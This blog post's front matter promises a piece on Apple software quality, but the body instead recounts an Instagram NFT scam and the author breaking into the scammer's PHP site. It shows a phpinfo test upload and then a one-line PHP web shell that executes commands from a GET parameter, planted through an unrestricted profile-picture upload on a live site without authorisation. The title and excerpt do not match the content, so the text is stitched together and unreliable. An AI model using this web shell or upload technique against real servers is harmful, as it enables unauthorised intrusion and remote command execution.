---
title: "Apple's Software Quality Crisis: When Premium Hardware Meets Subpar Software"
date: 2025-03-02 19:15
excerpt: Tim, I think we are not cooking
tags:
  - Apple
---

In the age of digital connectivity and social media, our virtual lives have
become increasingly intertwined with the online world. Instagram, one of the
world's most popular social networking platforms, offers us a space to share
moments, connect with friends, and even discover new opportunities. However,
amidst the genuine connections and inspiring content, a darker side lurks: the
realm of scams.

It all started 2 days ago, with a message like this:

> Hi. I'll love to purchase some of your work, if they are available for
> purchase. I am interested in purchasing 4 works digitally as NFT You need a
> platform to change them to NFT which is their digital form. Then I'll buy
> them for 2.70ETH which is $4,900 each. You have a wallet, right?

> I then got forwarded to Telegram, which I kindly declined, but I made them
> email me. That's the marketplace where you can upload your art so that I can
> purchase it, but you will need to set up an account with them before you can
> do that.
>
> uniquemost.online

I found myself on a PHP site. I registered an account (with fake credentials),
and started exploring the website. Furthermore, I was trying to find something
to do some kind of XSS or SQL injection, but then, I found something a little
bit more fun.

A file upload box to upload a profile picture. I tried putting
something that was not an image and the site accepted it. It gave me a path
under the same directory I was under. It tingled a part of my brain. I
suspected a web-shell-type of vulnerability.

I quickly made a PHP script to test that assumption:

```php
<?php
phpinfo();
?>
```

Opening later the "profile picture" resulted in showing phpinfo. Nice!

## Payload

I started writing a little payload to try and get a shell on this site.

```php
<?=`$_GET[0]`?>
```
